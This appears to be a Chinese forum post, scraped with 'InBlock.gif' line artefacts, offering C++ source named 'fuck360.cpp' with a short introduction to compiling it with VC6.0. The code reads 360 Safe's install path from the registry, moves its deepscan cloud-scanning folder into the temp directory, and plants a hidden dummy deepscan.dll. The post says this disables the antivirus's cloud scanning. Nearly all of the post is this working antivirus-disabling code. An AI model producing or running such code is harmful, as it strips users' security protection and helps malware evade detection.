InBlock.gif把下面的代码保存为一个cpp文件,用vc6.0编译即可    
InBlock.gif
InBlock.gif用了一个API函数 MoveFile ,把360云查杀的文件夹移动到temp目录,这样就让云查杀失效了,对开了保险箱的也是有效的    
InBlock.gif
InBlock.gif // ****************************************** fuck360.cpp ***********************************************    
InBlock.gif
InBlock.gif // By:洪流    
InBlock.gif#pragma comment(linker, "/OPT:NOWIN98")    
InBlock.gif#pragma comment(linker, "/merge:.data=.text")    
InBlock.gif#pragma comment(linker, "/merge:.rdata=.text")    
InBlock.gif#pragma comment(linker, "/align:0x200")    
InBlock.gif#pragma comment(linker, "/subsystem:windows")    
InBlock.gif#include <windows.h>    
InBlock.gif#include <stdio.h>    
InBlock.gif#pragma comment(lib, "MSVCRT.lib")    
InBlock.gif#pragma comment(linker, "/ENTRY:Torrent /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")    
InBlock.gif
InBlock.gif void Torrent()    
InBlock.gif{    
InBlock.gifHKEY hKey = NULL;    
InBlock.gifDWORD len=MAX_PATH;    
InBlock.gifDWORD type=REG_SZ;    
InBlock.gif char pBuf[200];    
InBlock.gifRegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360Safe.exe",0,KEY_ALL_ACCESS,&hKey);    
InBlock.gif if (RegQueryValueEx(hKey, "Path" , NULL, &type, (unsigned char*)pBuf, &len) == ERROR_SUCCESS)    
InBlock.gif{    
InBlock.gif char TempPath[200];    
InBlock.gif char exe[200];    
InBlock.gif char dll[200];    
InBlock.gif char exe_1[200];    
InBlock.gif char dll_1[200];    
InBlock.gifGetTempPath( sizeof(TempPath),TempPath);    
InBlock.gifwsprintf(TempPath, "%s\\tmp",TempPath);    
InBlock.gifwsprintf(pBuf, "%s\\deepscan",pBuf);    
InBlock.gifMoveFile(pBuf,TempPath);    
InBlock.gifCreateDirectory(pBuf,NULL);    
InBlock.gif
InBlock.gifwsprintf(exe, "%s\\360deepscan.exe",TempPath);    
InBlock.gifwsprintf(dll, "%s\\360wservice.dll",TempPath);    
InBlock.gif
InBlock.gifwsprintf(exe_1, "%s\\360deepscan.exe",pBuf);    
InBlock.gifwsprintf(dll_1, "%s\\360wservice.dll",pBuf);    
InBlock.gif
InBlock.gifCopyFile(exe,exe_1,FALSE);    
InBlock.gifCopyFile(dll,dll_1,FALSE);    
InBlock.gif
InBlock.gifFILE *file;    
InBlock.gifstrcat(pBuf, "\\deepscan.dll");    
InBlock.giffile=fopen(pBuf, "w");    
InBlock.gif char fuck[10];    
InBlock.gifwsprintf(fuck, "deepscan");    
InBlock.giffputs(fuck,file);    
InBlock.giffclose(file);    
InBlock.gifSetFileAttributes(pBuf, FILE_ATTRIBUTE_HIDDEN);    
InBlock.gif}    
InBlock.gifRegCloseKey(hKey);    
InBlock.gif}    
InBlock.gif
InBlock.gif //    
InBlock.gif
InBlock.gif    
InBlock.gif
InBlock.gif